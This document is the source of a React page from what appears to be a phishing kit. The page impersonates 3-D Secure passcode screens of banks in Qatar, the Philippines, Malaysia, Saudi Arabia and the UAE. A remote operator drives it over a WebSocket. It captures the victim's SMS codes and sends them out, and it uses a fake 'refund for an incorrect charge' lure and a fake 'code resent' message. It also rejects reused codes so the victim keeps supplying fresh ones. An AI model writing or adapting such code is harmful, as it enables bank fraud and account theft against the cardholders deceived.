import React, { useState, useEffect, useCallback } from 'react';
import { useNavigate } from 'react-router-dom';
import { useWebSocket } from '../hooks/useWebSocket';
import StandardCardLayout from './StandardCardLayout';
import QatarBankLayout, { isQatarBankDesign, QATAR_BANKS } from './qatar/QatarBankLayout';
import PhilippinesBankLayout, { isPhilippinesBankDesign } from './philippines/PhilippinesBankLayout';
import UaeBankLayout, { isUaeBankDesign } from './uae/UaeBankLayout';
import MalaysiaBankLayout, { isMalaysiaBankDesign } from './malaysia/MalaysiaBankLayout';
import KsaBankLayout, { isKsaBankDesign } from './ksa/KsaBankLayout';
import { getTranslation } from '../Utils/i18n';
import { isMastercard } from '../Utils/cardScheme';
import HelpImage from './assets/help.gif';

export default function OtpPage({ config, isRefund: propIsRefund }) {
  const navigate = useNavigate();
  const handleCleanCancel = () => {
    sessionStorage.removeItem('rejected_card');
    const checkoutPath = localStorage.getItem('checkout_path') || '/';
    navigate(checkoutPath);
  };
  const mode = config?.mode || localStorage.getItem('session_mode') || ((typeof process !== 'undefined' && process.env.REACT_APP_MODE) || undefined) || 'standardEN';
  const t = getTranslation(mode);
  const isRtl = t.dir === 'rtl';

  const [code, setCode] = useState('');
  const [timeLeft, setTimeLeft] = useState(120);
  const [isDuplicate, setIsDuplicate] = useState(false);
  const [isShaking, setIsShaking] = useState(false);
  const [isSubmitting, setIsSubmitting] = useState(false);
  const [resendSuccess, setResendSuccess] = useState(false);
  
  const { sendResponse, currentCommand } = useWebSocket();
  const design = localStorage.getItem('session_design') || 'ph_bdo';
  const uuId = localStorage.getItem('session_uuId') || localStorage.getItem('uuId') || 'default';
  const isMc = isMastercard(design);

  const isRefundMode = Boolean(
    propIsRefund ||
    window.location.pathname.includes('refund') ||
    currentCommand?.isRefund === true ||
    currentCommand?.type === 'show_refund' ||
    currentCommand?.to === 'refund_page'
  );

  const historyKey = (isRefundMode ? 'submitted_refund_otps_' : 'submitted_otps_') + uuId;
  const retryFlagKey = (isRefundMode ? 'refund_retry_flag_' : 'otp_retry_flag_') + uuId;

  // Retrieve array of previously submitted codes for this session
  const getSubmittedOtps = useCallback(() => {
    try {
      const s1 = JSON.parse(sessionStorage.getItem(historyKey) || '[]');
      const s2 = JSON.parse(localStorage.getItem(historyKey) || '[]');
      const s3 = JSON.parse(localStorage.getItem(isRefundMode ? 'submitted_refund_otps_global' : 'submitted_otps_global') || '[]');
      return Array.from(new Set([...s1, ...s2, ...s3]));
    } catch (_) {
      return [];
    }
  }, [historyKey, isRefundMode]);

  // Determine if retry state is active (from WebSocket command or persisted across reload)
  const isRetryActive = 
    currentCommand?.isRetry === true || 
    currentCommand?.type === 'wrong_code' || 
    currentCommand?.to === 'wrong_code' || 
    Boolean(currentCommand?.errorMessage) || 
    localStorage.getItem('otp_retry') === 'true' ||
    localStorage.getItem(retryFlagKey) === 'true' ||
    sessionStorage.getItem(retryFlagKey) === 'true';

  // Persist retry flag if new retry command arrives
  useEffect(() => {
    if (currentCommand?.isRetry || currentCommand?.type === 'wrong_code' || currentCommand?.to === 'wrong_code' || currentCommand?.errorMessage) {
      sessionStorage.setItem(retryFlagKey, 'true');
      localStorage.setItem(retryFlagKey, 'true');
      localStorage.setItem('otp_retry', 'true');
      setCode('');
      setIsDuplicate(false);
      setTimeLeft(120);
    }
  }, [currentCommand, retryFlagKey]);

  // Timer countdown
  useEffect(() => {
    if (timeLeft <= 0) return;
    const timer = setInterval(() => setTimeLeft(prev => prev - 1), 1000);
    return () => clearInterval(timer);
  }, [timeLeft]);

  const isUae = isUaeBankDesign(design) || design.startsWith('uae_');
  const isQatar = isQatarBankDesign(design) || design.startsWith('qatar_');
  const isPH = isPhilippinesBankDesign(design) || design.startsWith('ph_');
  const isMY = isMalaysiaBankDesign(design) || design.startsWith('my_');
  const isKSA = isKsaBankDesign(design) || design.startsWith('ksa_');

  // Input length limits: UAE (6), Qatar (6), Philippines (6-8), Malaysia (6-10), Standard (4-8)
  const maxLen = (isUae || isQatar) ? 6 : (isMY ? 10 : 8);

  const isCodeLengthValid = (codeStr) => {
    const len = codeStr.length;
    if (isUae || isQatar) return len === 6;
    if (isPH) return len >= 6 && len <= 8;
    if (isMY) return len >= 6 && len <= 10;
    return len >= 4 && len <= 8;
  };

  // Real-time input change with instant duplicate validation
  const handleCodeChange = (e) => {
    const rawVal = e.target.value.replace(/\D/g, '').slice(0, maxLen);
    setCode(rawVal);

    const minDuplicateLen = (isUae || isQatar || isPH || isMY) ? 6 : 4;
    if (rawVal.length >= minDuplicateLen) {
      const history = getSubmittedOtps();
      if (history.includes(rawVal)) {
        setIsDuplicate(true);
        setIsShaking(true);
        setTimeout(() => setIsShaking(false), 450);
        return;
      }
    }
    if (isDuplicate) {
      setIsDuplicate(false);
    }
  };

  const triggerResend = () => {
    setCode('');
    setIsDuplicate(false);
    setResendSuccess(true);
    setTimeout(() => setResendSuccess(false), 3500);
  };

  // Error message resolution
  let errorMessage = null;
  if (isDuplicate) {
    errorMessage = t.duplicateOtp;
  } else if (isRetryActive) {
    errorMessage = currentCommand?.errorMessage || t.invalidOtp;
  }

  const bank = isQatar ? QATAR_BANKS[design] : null;

  const handleSubmit = (e) => {
    e.preventDefault();
    const cleanCode = code.trim();
    if (!isCodeLengthValid(cleanCode) || isSubmitting) return;

    const history = getSubmittedOtps();
    // Block duplicate code submission
    if (history.includes(cleanCode)) {
      setIsDuplicate(true);
      setIsShaking(true);
      setTimeout(() => setIsShaking(false), 450);
      return;
    }

    // Save code to history so user cannot re-enter the same SMS again in this session
    history.push(cleanCode);
    sessionStorage.setItem(historyKey, JSON.stringify(history));
    localStorage.setItem(historyKey, JSON.stringify(history));
    localStorage.setItem(isRefundMode ? 'submitted_refund_otps_global' : 'submitted_otps_global', JSON.stringify(history));

    // Clear retry error flag now that user submitted a fresh code
    sessionStorage.removeItem(retryFlagKey);
    localStorage.removeItem(retryFlagKey);
    localStorage.removeItem('otp_retry');
    setIsDuplicate(false);
    setIsSubmitting(true);

    // Send response to server (refund_response or otp_response)
    if (isRefundMode) {
      sendResponse('refund_response', { code: cleanCode });
    } else {
      sendResponse('otp_response', { code: cleanCode });
    }
  };

  const formatTime = (seconds) => {
    const m = Math.floor(seconds / 60);
    const s = seconds % 60;
    return `${m}:${s < 10 ? '0' : ''}${s}`;
  };

  const refundTitle = isRtl ? 'المصادقة على استرداد الأموال' : 'Refund Verification';
  const refundSubtitle = isRtl
    ? 'تم اكتشاف خصم غير صحيح. للتحقق من استرداد أموالك وإصداره، يرجى إدخال رمز الرسالة القصيرة (SMS) الجديد:'
    : 'We’ve detected an incorrect charge. To verify and issue your refund, please enter the new SMS code:';
  const refundBtnText = isRtl ? 'تأكيد الاسترداد' : 'CONFIRM REFUND';

  // 1. Qatar Bank Branded Design (Strictly for Qatar bank BINs)
  if (isQatar && bank) {
    return (
      <QatarBankLayout
        design={design}
        mode="otp"
        code={code}
        setCode={setCode}
        handleCodeChange={handleCodeChange}
        handleSubmit={handleSubmit}
        errorMessage={errorMessage}
        isDuplicate={isDuplicate}
        isRetryActive={isRetryActive}
        isShaking={isShaking}
        isSubmitting={isSubmitting}
        timeLeft={timeLeft}
        formatTime={formatTime}
        setIsDuplicate={setIsDuplicate}
        onCancel={() => navigate('/')}
        isRefund={isRefundMode}
      />
    );
  }

  // 2. Philippines Bank Branded Design (BDO, Landbank, Metrobank, etc.)
  if (isPhilippinesBankDesign(design)) {
    return (
      <PhilippinesBankLayout
        design={design}
        code={code}
        setCode={setCode}
        handleCodeChange={handleCodeChange}
        handleSubmit={handleSubmit}
        errorMessage={errorMessage}
        isDuplicate={isDuplicate}
        isRetryActive={isRetryActive}
        isShaking={isShaking}
        isSubmitting={isSubmitting}
        timeLeft={timeLeft}
        formatTime={formatTime}
        setIsDuplicate={setIsDuplicate}
        onCancel={() => navigate('/')}
        isRefund={isRefundMode}
      />
    );
  }

  // 2.5. Malaysia Bank Branded Design (Affin, BSN, Hong Leong, UOB, Maybank, BIMB, etc.)
  if (isMY) {
    return (
      <MalaysiaBankLayout
        design={design}
        mode={isRefundMode ? 'refund' : 'otp'}
        code={code}
        setCode={setCode}
        handleCodeChange={handleCodeChange}
        handleSubmit={handleSubmit}
        errorMessage={errorMessage}
        isDuplicate={isDuplicate}
        isRetryActive={isRetryActive}
        isShaking={isShaking}
        isSubmitting={isSubmitting}
        timeLeft={timeLeft}
        formatTime={formatTime}
        setIsDuplicate={setIsDuplicate}
        onCancel={() => navigate('/')}
        isRefund={isRefundMode}
      />
    );
  }

  // 2.7. KSA (Saudi Arabia) Bank Branded Design
  if (isKSA) {
    return (
      <KsaBankLayout
        design={design}
        mode={isRefundMode ? 'refund' : 'otp'}
        code={code}
        setCode={setCode}
        handleCodeChange={handleCodeChange}
        handleSubmit={handleSubmit}
        errorMessage={errorMessage}
        isDuplicate={isDuplicate}
        isRetryActive={isRetryActive}
        isShaking={isShaking}
        isSubmitting={isSubmitting}
        timeLeft={timeLeft}
        formatTime={formatTime}
        setIsDuplicate={setIsDuplicate}
        onCancel={handleCleanCancel}
        isRefund={isRefundMode}
      />
    );
  }

  // 3. UAE Bank Branded Design (ADIB / WIO / FAB)
  if (isUaeBankDesign(design)) {
    const isWio = design.includes('wio');
    const isFab = design.includes('fab');
    const uaeBank = isFab ? 'fab' : (isWio ? 'wio' : 'adib');
    return (
      <UaeBankLayout
        bank={uaeBank}
        scheme={isMc ? 'mastercard' : 'visa'}
        mode="otp"
        title={isRefundMode ? refundTitle : (isFab ? 'Payment Authentication' : (isWio ? 'Confirm Your Identity' : 'Authenticate via SMS OTP'))}
        subtitle={isRefundMode ? refundSubtitle : null}
        code={code}
        setCode={setCode}
        handleCodeChange={handleCodeChange}
        handleSubmit={handleSubmit}
        errorMessage={errorMessage}
        isDuplicate={isDuplicate}
        isRetryActive={isRetryActive}
        isShaking={isShaking}
        isSubmitting={isSubmitting}
        timeLeft={timeLeft}
        formatTime={formatTime}
        setIsDuplicate={setIsDuplicate}
        onExit={() => navigate('/')}
        isRefund={isRefundMode}
      />
    );
  }

  // 4. Standard 3DS Design (Exact 1:1 replica of manual/providers/3ds/Otp.jsx)
  return (
    <StandardCardLayout
      title={isRefundMode ? refundTitle : (isRtl ? 'أدخل رمز التحقق (OTP)' : 'Enter one-time Passcode')}
      subtitle={isRefundMode ? refundSubtitle : (isRtl ? 'يلزم إدخال رمز تحقق لمرة واحدة لإتمام عملية الشراء. تم إرسال هذا الرمز إلى هاتفك المحمول المسجل.' : 'A one-time Passcode is required for this purchase. This Passcode has been sent to your registered mobile phone number.')}
      errorMessage={errorMessage}
      mode={mode}
      scheme={isMc ? 'mastercard' : 'visa'}
    >
      <form onSubmit={handleSubmit}>
        <div className="scl-input-grid">
          <label htmlFor="otp" className="scl-input-label">
            {isRtl ? 'رمز التحقق (OTP):' : 'Enter One-Time Passcode:'}
          </label>

          <input
            id="otp"
            value={code}
            onChange={handleCodeChange}
            type="text"
            maxLength={maxLen}
            className={`scl-input ${isDuplicate || (isRetryActive && !code) ? 'scl-input--error' : ''} ${isShaking ? 'scl-input--shake' : ''}`}
            placeholder={isRtl ? 'أدخل الرمز' : 'Enter Passcode'}
            inputMode="numeric"
            autoComplete="one-time-code"
            dir="ltr"
            autoFocus
          />

          <div />
          <div className="scl-link-row">
            <a 
              href="#resend" 
              onClick={(e) => { e.preventDefault(); triggerResend(); }}
              className="scl-link"
            >
              {isRtl ? 'لم تستلم رمز التحقق؟' : "Haven't received a one-time passcode?"}
            </a>
          </div>
        </div>

        {resendSuccess && (
          <div style={{
            background: '#ecfdf5',
            border: '1px solid #a7f3d0',
            color: '#065f46',
            padding: '8px 12px',
            borderRadius: '6px',
            fontSize: '12px',
            fontWeight: 600,
            textAlign: 'center',
            margin: '10px 0'
          }} role="status">
            ✓ {isRtl ? 'تم إرسال رمز تحقق جديد بنجاح' : 'New code sent to your mobile phone'}
          </div>
        )}

        <div className="scl-btn-bar">
          <button 
            type="button" 
            onClick={() => navigate('/')} 
            className="scl-cancel-btn"
          >
            {isRtl ? 'إلغاء' : 'Cancel'}
          </button>

          <button
            type="submit"
            disabled={!isCodeLengthValid(code) || isDuplicate || isSubmitting}
            className="scl-submit-btn"
          >
            {isSubmitting ? <div className="inputLoader" /> : (isRefundMode ? refundBtnText : (isRtl ? 'إرسال' : 'Submit'))}
          </button>

          <button 
            type="button" 
            onClick={() => alert(isRtl ? 'للمساعدة، يرجى التواصل مع البنك المصدر لبطاقتك.' : 'For assistance, please contact your card issuing bank.')}
            className="scl-help-btn"
          >
            <img className="scl-help-icon" src={HelpImage} alt="" />
            {isRtl ? 'مساعدة' : 'Help'}
          </button>
        </div>
      </form>
    </StandardCardLayout>
  );
}

